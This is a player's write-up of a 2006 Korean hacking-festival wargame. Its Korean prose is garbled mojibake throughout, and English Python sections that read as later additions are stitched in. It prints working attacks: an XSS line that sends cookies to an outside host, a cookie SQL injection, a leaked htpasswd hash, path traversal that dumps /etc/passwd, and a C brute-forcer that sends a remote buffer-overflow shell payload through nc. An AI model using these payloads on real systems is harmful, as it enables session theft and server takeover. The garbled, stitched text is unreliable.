-----------------------------------
Argos Hacking Festival 0x7d6 rEpOrT
-----------------------------------

# whoami
iD        |  hkpco( madog )
nAmE      |  Park Chan-Am
mAiL&MsN  |  hkpco@korea.com
tEaM      |  wowhacker & wowcode
hOmEpAgE  |  http://hkpco.kr/


/ contents /
=============================================
level1 ~ level8
	one page, many holes

level9
	reverse engineering

level10
	web server vulnerability
	fedora core 3 remote buffer overflow
=============================================



level!

Notice Խǿ `Really Simple Syndication`̶ Խñ ϳ ֽϴ.
̴ rss ڷ Խñ  WhereΰͰ ؼ rss 丮    ֽϴ.
Ʒ ּҷ  丮  Ǹ ahf2006.xml̶  ϳ   ֽϴ.

http://168.188.130.242/ahf2006/rss/

 ŬϿ  Hint  defcon ǥ web2.0 Feed Injection ũ Ǿ ֽϴ.
κ    ̿Ͽ Ѵٰ    ִµ ̴ ӼԴϴ.
ҽ⸦ ϸ   Ư ּҸ  iframeױ׸ ϰ ִ°   ֽϴ.

<iframe src=./rss_password width=0 height=0>

http://168.188.130.242/ahf2006/main/rss_password ּҷ ϸ ģϰ н带 ˷ݴϴ.

մϴ! level1 Դϴ!
н 'RssAtomFeedInjection' Դϴ.





level@

Community Խ xssԴϴ.
  xss ϸ ȵǰ ڰ     ۼϿ մϴ.
  Ϲ xssڵ  ϴ.

<script>document.location="http://hkpco.joinc.co.kr/query.php?query=" + document.cookie</script>

 ٷȴٰ  Ű Ȯϸ

NAME=GUEST; PHPSESSID=348bdcc25a0358cbfa3c09df7121d0b7; level2_password=Social_is_the_best_hacking

н Social_is_the_best_hacking





level#

ҽ⸦ ϸ default.css  Ǿ ϴ.
캸,   url importǾ ֽϴ.

@import url("./ahf2006.css");

̸ 80 Ʈ ûغ Ʒ ϴ.

[hkpco@ns ahf]$ telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
GET http://168.188.130.242/ahf2006/css/ahf2006.css HTTP/1.0

HTTP/1.1 200 OK
Date: Thu, 15 Feb 2007 14:47:02 GMT
Server: Apache/1.3.36 (Unix) PHP/4.4.2
Last-Modified: Tue, 13 Feb 2007 21:11:24 GMT
ETag: "8202c3-2f-45d2297c"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/css

<img src="./secret.php" width="0" height ="0">
Connection closed by foreign host.

secret.php  ϸ,

http://168.188.130.242/ahf2006/css/secret.php
ϵ帳ϴ! ̰ 峭 ƴϽñ :)
level3 н 'css_import_faked' Դϴ.





level$

ҽ⸦  ϸ <embed src=http://168.188.130.242/~admin/head_00.swf">  ±׸   ֽϴ.
admin̶  ÷ ÷ ϴ°   ֽϴ.

⼭  ߸ Ͽ http://168.188.130.242/~admin/admin/    ãҰ,
admin̶ ̵ ãƳ bruteforceα׷ ̿Ͽ  ȿ ϴ.
ݻغ н ߴµ Ƹ  Ƽ ׷ ϴ.

admin̶  .bash_historyϿ ۾   Դϴ.
http://168.188.130.242/~admin/.bash_history

  ۾ Դϴ.
/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin
/usr/local/apache/bin/apachectl restart

http://168.188.130.242/~admin/auth  Ͽ ,

admin:8G.C0m9ZnM8JQ
// admin password is admin123 :)

admin н admin123̶    ֽϴ.

ȹ id/pw ̿Ͽ Ͽ 

Ƹ  ȸ x15kangx  载⸦ Ѵ. 
մϴ! level4 н 'qhrrheostm_qotmfrl' Դϴ.





level%

introduce Ƹ Ұ ɴϴ.
 ߰߰ <b> ̿Ͽ  ĺ ϰ ǥ   ֽϴ.
ҽ⸦ ϸ  ڸ  ã  ִµ ̸ غ google ɴϴ.
badboys Խ ã Ͽ google̶ ܾ  Ͽ ۰˻    ֽϴ.
Ʒ  ۷ ˻ϸ

badboys site:argos.or.kr
http://argos.or.kr/bbs/zboard.php?id=badboys  ּҸ   ֽϴ.

AHF õ Խñ о,

 Ÿ  ٴٸ ǳʿô  ̽ϴ.

 ûϽ κ Խ Ƹ ܺηδ ũ ϰ,
ο ߴ "庸" ԽԴϴ.

! Ͻô° 帮ڽϴ.

level5 н 'GoogleDork@badboys' Դϴ. 

մϴ.





level^

index.php ɾ ִ flash action script  Ͽ 80Ʈ ûϸ    ֽϴ.

[hkpco@ns hkpco]$ telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
GET /index.php HTTP/1.0

<font color=#ffffff><small>մϴ! level6 Դϴ!</small></font>
<br><font color=#ffffff><small>н HackTheFlashActionScript Դϴ.</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>
Connection closed by foreign host.





level&

gif SteganographyԴϴ.
װ빮 н ش  ҽ⸦     ֽϴ.( passwd: fbthdms )
introduction ִ badboys.gif  HIP(Hide In Picture)̶ α׷   Ʒ ϴ.

\x30\x31\x30
\x20\x2D\x20
\x36\x34\x37\x39
\x20\x2D\x20
\x36\x39\x38\x38
\x20
\x63\x61\x6c\x6c
\x20
\x6d\x65

̸ ڷ Ÿ 

[hkpco@ns ahf]$ hk \x30\x31\x30\x20\x2D\x20\x36\x34\x37\x39\x20\x2D\x20\x36\x39\x38\x38\x20\x63\x61\x6c\x6c\x20\x6d\x65 \x
010 - **** - 6988 call me

 ȭȣ йȣ   ں ""  ֽʴϴ.
, wjehahffkdy()
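The dump above is a plain run of `\xHH` escapes, one byte per escape, split across lines. The following decoder is an added example (not the `hk` tool the author ran, and not part of the original report) that turns such a dump back into text and refuses a truncated or corrupted escape instead of skipping it; `SAMPLE_DUMP` is constructed for the example, it is not the bytes from the picture.

```python
import re

# One \xHH escape, the notation the steganography tool printed.
_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_hex_escapes(dump: str, encoding: str = "ascii") -> str:
    """Decode a dump made only of \\xHH escapes (whitespace and newlines between
    them are ignored) into text. Anything that is not a complete escape raises,
    so a truncated or corrupted dump is reported rather than silently dropped."""
    compact = re.sub(r"\s+", "", dump)
    raw = bytearray()
    pos = 0
    while pos < len(compact):
        m = _ESCAPE.match(compact, pos)
        if m is None:
            raise ValueError(f"not a \\xHH escape at offset {pos}: {compact[pos:pos + 4]!r}")
        raw.append(int(m.group(1), 16))
        pos = m.end()
    return raw.decode(encoding)


def encode_hex_escapes(data: bytes, per_line: int = 0) -> str:
    """Inverse of decode_hex_escapes; per_line > 0 breaks the output into
    lines of that many bytes, like the multi-line dump in the write-up."""
    escapes = [f"\\x{b:02x}" for b in data]
    if per_line <= 0:
        return "".join(escapes)
    return "\n".join(
        "".join(escapes[i:i + per_line]) for i in range(0, len(escapes), per_line)
    )


# Constructed sample in the same layout as the dump above (not the page's data).
SAMPLE_DUMP = """\\x63\\x61\\x6c\\x6c
\\x20
\\x6d\\x65"""

if __name__ == "__main__":
    print(decode_hex_escapes(SAMPLE_DUMP))            # call me
    print(encode_hex_escapes(b"call me", per_line=4))
```

The decoder deliberately matches escape by escape instead of using `codecs.decode(..., "unicode_escape")`, so a stray byte or a half escape fails loudly; when analysing a hidden payload you want to know the dump was damaged rather than read a silently altered message.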





level*

ADMINPAGE  ϸ  ٰ ϴ.
 Ű  NAME=GUEST Ǿֽϴ.
NAME=ADMIN    `ڴ  `  ְ ``̶ ڰ  Ǿ ֽϴ.
Ű  sql injection    ִµ,   Ű ٲپ  ϴ.

NAME='or 1=1#

  ȸ ǰ  Ȥϴ    ġ  ʴ   ݴϴ.
  ˾Ƶ  ϴ.     ߽ϴ.
 manlikessexygirl





level(

AHF2006.exe   ϳ ־ϴ.
Ѻ 2006 ڸ MessageBox ̿Ͽ ݴϴ.
 ϸ ̶ ϴµ ̸  Ϸ 2006 ͸  ־ մϴ.
 츮     ϴ.
ollydbg    캸ڽϴ.

004014F4   . C74424 20 2100>MOV DWORD PTR SS:[ESP+20],21
004014FC   . 894424 24      MOV DWORD PTR SS:[ESP+24],EAX
00401500   . C74424 28 3B00>MOV DWORD PTR SS:[ESP+28],3B
00401508   . 897C24 2C      MOV DWORD PTR SS:[ESP+2C],EDI
0040150C   . C74424 30 4D00>MOV DWORD PTR SS:[ESP+30],4D
00401514   . C74424 34 5000>MOV DWORD PTR SS:[ESP+34],50
.
.
.
00406663   . C78424 441F000>MOV DWORD PTR SS:[ESP+1F44],41
0040666E   . C78424 4C1F000>MOV DWORD PTR SS:[ESP+1F4C],14
00406679   . 898C24 501F000>MOV DWORD PTR SS:[ESP+1F50],ECX
00406680   . 899C24 541F000>MOV DWORD PTR SS:[ESP+1F54],EBX
00406687   . C78424 581F000>MOV DWORD PTR SS:[ESP+1F58],45

ESP+20 ~ ESP+1F44 , 4Ʈ    2006 ڸ Ҵմϴ.


Ʒ ڵ尡  ߿մϴ.

004066EA   . 33FF           XOR EDI,EDI
004066F4   . 33C0           XOR EAX,EAX                              ;  AHF2006.00430414
004066F6   . 8D7424 20      LEA ESI,DWORD PTR SS:[ESP+20]
004066FA   > 8B2E           MOV EBP,DWORD PTR DS:[ESI]
004066FC   . 03FD           ADD EDI,EBP
004066FE   . 40             INC EAX
004066FF   . 894424 1C      MOV DWORD PTR SS:[ESP+1C],EAX
.
.
.
00406750     E8 B67A0100    CALL AHF2006.0041E20B
00406755   . 8B4424 1C      MOV EAX,DWORD PTR SS:[ESP+1C]
00406759   . 83C6 04        ADD ESI,4
0040675C   . 3D D6070000    CMP EAX,7D6
00406761    ^7C 97          JL SHORT AHF2006.004066FA

eax 0 ʱȭ ѵ, 2006  ù° (ESP+20) ESI ְ ó ϰ
004066FA ~ 00406761 ̿  ϴ.

ESP+20 ּҰ ESI Ҵϰ ESI  EBP ̵մϴ.
׸ ʱȭ EDI EBP ѵ   0 EAX 1 ŵϴ.
EAXʹ ٸ κп ϹǷ ESP+1C Ͽ Ӵϴ.

CALL AHF2006.0041E20B MessageBoxԼ ̿Ͽ n° ڸ ִ κԴϴ.
׸ Ʊ Ǿ ESP+1C(EAX) ٽ EAX ̵Ų , ESI +4 մϴ.
EAX 0x7d6(10 2006)    EAX  004066FA մϴ.
ESI +4 ϴ  int 迭 2006 ڸ ҴϿµ    4Ʈ ̱ Դϴ.

 ƾ  ᱹ EDIͿ 2006 ڸ    ִٴ    ֽϴ.
 MessageBoxԼ  2006 ͸ ľ մϴ.
 û ŷο ֱ Ͽ MessageBox ȣϴ call  ϴ.

0041E20B ּҷ ̵ϰ Ǹ  Ʒκп MessageBoxԼ  Ű  κ ֽϴ.

0041E229     FF7424 10            PUSH DWORD PTR SS:[ESP+10]                             ; /Style
0041E22D     50                   PUSH EAX                                               ; |Title
0041E22E     FF7424 10            PUSH DWORD PTR SS:[ESP+10]                             ; |Text
0041E232     51                   PUSH ECX                                               ; |hOwner
0041E233     FF15 08744200        CALL DWORD PTR DS:[<&USER32.MessageBoxA>]              ; \MessageBoxA

̸  NOP äְ  

00406763   . 8D4C24 14            LEA ECX,DWORD PTR SS:[ESP+14]

κп breakpoint ɾ  α׷  Ű Ǹ EDIͿ 00018426    ˴ϴ.

̸ 10 Ÿ 99366
׷Ƿ  99366
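The author recovered the sum dynamically, by patching out the MessageBox call and breaking after the loop to read EDI (0x18426 = 99366). As an added example, not from the report or the binary's authors, the script below shows the static side of the same analysis: it parses the OllyDbg listing lines shown above, pulls out every `MOV DWORD PTR SS:[ESP+off],value` store, maps each offset to its index in the 2006-entry array (first slot at ESP+20, count 0x7D6 from the CMP), and reproduces the 32-bit accumulation loop. Only the excerpt from the page is used as input, and slots filled from a register (EAX, EDI, ECX, EBX) cannot be read off the listing, so the result here is a partial sum and is not 99366; the function names and `SAMPLE_LISTING` are this example's own.

```python
import re

# One line of the listing: a store of a 32-bit value to [ESP+off].
_STORE = re.compile(
    r"MOV DWORD PTR SS:\[ESP\+([0-9A-Fa-f]+)\],([0-9A-Fa-f]+|E[A-Z]{2})\s*$"
)
REGISTERS = {"EAX", "EBX", "ECX", "EDX", "ESI", "EDI", "EBP", "ESP"}

FIRST_SLOT = 0x20   # LEA ESI,[ESP+20]: the array starts here
COUNT = 0x7D6       # CMP EAX,7D6: the loop visits 2006 entries


def parse_stack_stores(listing: str) -> dict:
    """Map stack offset -> stored value. Immediates become ints; a register
    operand is kept as its name because its value is unknown statically."""
    stores = {}
    for line in listing.splitlines():
        m = _STORE.search(line)
        if m is None:
            continue                      # '.' separators and other instructions
        offset = int(m.group(1), 16)
        operand = m.group(2).upper()
        stores[offset] = operand if operand in REGISTERS else int(operand, 16)
    return stores


def slot_index(offset: int) -> int:
    """0-based index of the array element that lives at a stack offset."""
    if offset < FIRST_SLOT or (offset - FIRST_SLOT) % 4:
        raise ValueError(f"offset {offset:#x} is not a 4-byte slot from {FIRST_SLOT:#x}")
    return (offset - FIRST_SLOT) // 4


def loop_sum(values) -> int:
    """The accumulation loop: EDI starts at 0 and each ADD wraps at 32 bits."""
    edi = 0
    for v in values:
        edi = (edi + v) & 0xFFFFFFFF
    return edi


def summarize(stores: dict):
    """Sum of the immediates visible in the listing, plus the number of slots
    whose value came from a register and so is not recoverable statically."""
    known = [v for v in stores.values() if isinstance(v, int)]
    unknown = sum(1 for v in stores.values() if not isinstance(v, int))
    return loop_sum(known), unknown


# Excerpt of the listing above, used as sample input for this example.
SAMPLE_LISTING = """\
004014F4   . C74424 20 2100>MOV DWORD PTR SS:[ESP+20],21
004014FC   . 894424 24      MOV DWORD PTR SS:[ESP+24],EAX
00401500   . C74424 28 3B00>MOV DWORD PTR SS:[ESP+28],3B
00401508   . 897C24 2C      MOV DWORD PTR SS:[ESP+2C],EDI
0040150C   . C74424 30 4D00>MOV DWORD PTR SS:[ESP+30],4D
00401514   . C74424 34 5000>MOV DWORD PTR SS:[ESP+34],50
00406663   . C78424 441F000>MOV DWORD PTR SS:[ESP+1F44],41
0040666E   . C78424 4C1F000>MOV DWORD PTR SS:[ESP+1F4C],14
00406679   . 898C24 501F000>MOV DWORD PTR SS:[ESP+1F50],ECX
00406680   . 899C24 541F000>MOV DWORD PTR SS:[ESP+1F54],EBX
00406687   . C78424 581F000>MOV DWORD PTR SS:[ESP+1F58],45
"""

if __name__ == "__main__":
    stores = parse_stack_stores(SAMPLE_LISTING)
    for off in sorted(stores):
        print(f"slot {slot_index(off):4d} [ESP+{off:X}] = {stores[off]}")
    total, unknown = summarize(stores)
    print(f"partial sum {total:#x} ({total}), {unknown} slots filled from registers")
```

The register-filled slots are exactly why the author's dynamic approach (neutralising the MessageBox call and reading EDI at the breakpoint) is the practical one here: a static pass over the listing tells you the array layout and the loop bound, but not the values that were computed at run time.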





level)

8080Ʈ   ־ϴ.

-> GET request_file

   û Ǹ Ͼտ ڵ . ڰ ߰Ǿϴ.

 ̸ Է  ڵ index.html ûϰ ˴ϴ.

../  Ͽ  ο ִ ϵ     ֽϴ.

  /etc/passwd ûմϴ.

[hkpco@ns ahf]$ telnet 168.188.130.249 8080
Trying 168.188.130.249...
Connected to 168.188.130.249.
Escape character is '^]'.
GET ./../../../../../etc/shadow

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin
x15kangx:x:500:500:Jun-Hee:/home/x15kangx:/bin/bash
choco1435:x:501:501::/home/choco1435:/bin/bash
mysql:x:502:502:Mysql_server:/usr/local/mysql:/bin/nologin
thanatos:x:503:503::/home/thanatos:/bin/bash
exso:x:504:504::/home/exso:/bin/bash
ssabro:x:505:505::/home/ssabro:/bin/bash
jerasordy:x:506:506::/home/jerasordy:/bin/bash
laidback_girl:x:507:507::/home/laidback_girl:/bin/bash
llplatinumll:x:508:508::/home/llplatinumll:/bin/bash


  index.html   , ʽ   level10 Ǯϴµ ʿ    ־ϴ.

[hkpco@ns ahf]$ telnet 168.188.130.249 8080
Trying 168.188.130.249...
Connected to 168.188.130.249.
Escape character is '^]'.
GET ./../../../../../home/x15kangx/public_html/index.html

<html>
<body>

{<text variable, no debug info>} 0xd2d780 <system>
ret: 8049a5a

մϴ.   ʽ  Դϴ.^^
ã̳׿?^^

post 'level'׸ bonus ٲٰ ϼ.

http://168.188.130.243/ahf2006/main/level_auth_action.php


BonusPasswd: Yap!!

</body>
</html>

ʽ    , ⼭  retcodeּҿ systemּҸ ̿Ͽ   Ͽ մϴ.
 ִ  GET  û Ͼ BufferOverFlow Դϴ.
fedora core3 remote bof  ϰڽϴ.

 縦 غ   Fedora core 3 ̾,    Ǵ ( ~sfp ) ߽ϴ.
retcode ּҸ Ű systemԼ ڰ ebp ִ shɾ     bruteforce õմϴ.

[hkpco@ns ahf]$ cat brute.c
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>

int main( void )
{
	int c=0,i=0;
	char cmd[1024]={0x00,};

	for( ; c<31 ; c++ , i++ )
	{
		printf( "%d\n" , i );
		/* adjacent string literals are concatenated by the compiler */
		sprintf( cmd , "(perl -e \'print \"GET \", \"a\"x381, \";sh\","
				 "\"\\x5a\\x9a\\x04\\x08\"x%d,"
				 "\"\\x80\\xd7\\xd2\\x00\","
				 "\"\\r\\n\\r\\n\"\';cat) | nc 168.188.130.249 8080" , c );
		printf( "%s\n" , cmd );
		system( cmd );
	}
	printf( "bye.\n" );
	return 0;
}

[hkpco@ns ahf]$ ./brute
0
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x0,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

1
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x1,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

2
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x2,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

3
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x3,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

.
.
.

27
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x27,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

28
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x28,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

29
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x29,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

30
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x30,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

bye.
[hkpco@ns ahf]$

  ʾ ȮϿ   ׾־ ȸ ϴ.
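The two weaknesses in the level-10 server, serving `../`-relative targets straight from the request line and copying an unbounded `GET` line into a fixed stack buffer, are both visible in the raw request before any file is opened. As an added example, from a defender's side and not part of the report or the contest server, the script below checks request lines the way a front-end filter or log monitor would (length, non-printable bytes, traversal sequences) and shows the docroot containment check the server was missing. The limit, docroot and `SAMPLE_REQUESTS` are constructed for this example.

```python
import posixpath
import re
from typing import List, Optional

# Constructed limits for this example; a real server would tune them.
MAX_REQUEST_LINE = 256
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def check_request_line(line: bytes) -> List[str]:
    """Return the reasons a raw request line should be rejected or alerted on."""
    findings = []
    body = line.rstrip(b"\r\n")
    if len(body) > MAX_REQUEST_LINE:
        findings.append(f"oversized request line ({len(body)} bytes)")
    if any(b < 0x20 or b > 0x7E for b in body):
        findings.append("non-printable bytes in request line")
    # latin-1 never fails to decode, so the target can still be inspected
    parts = body.decode("latin-1").split()
    if len(parts) >= 2 and parts[0] == "GET" and TRAVERSAL.search(parts[1]):
        findings.append("path traversal sequence in target")
    return findings


def resolve_under_docroot(docroot: str, target: str) -> Optional[str]:
    """Normalise the requested path and refuse anything that leaves docroot.
    Returns the resolved path, or None when the request escapes the root."""
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, target.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


# Constructed sample request lines modelled on the sessions above.
SAMPLE_REQUESTS = [
    b"GET index.html\r\n",
    b"GET ./../../../../../etc/passwd\r\n",
    b"GET /" + b"A" * 400 + b"\x90\x90\r\n",   # long line with non-printable bytes
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[:40], check_request_line(req) or "ok")
    for target in ("index.html", "./../../../../../etc/passwd", "a/../b.html"):
        print(target, "->", resolve_under_docroot("/srv/www", target))
```

`posixpath.normpath` only collapses `.` and `..` lexically; a server that follows symlinks should call `os.path.realpath` on the candidate and repeat the same prefix check, and the length limit belongs on the `recv` side as well, so that the request line is truncated or dropped before it reaches any fixed-size buffer.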
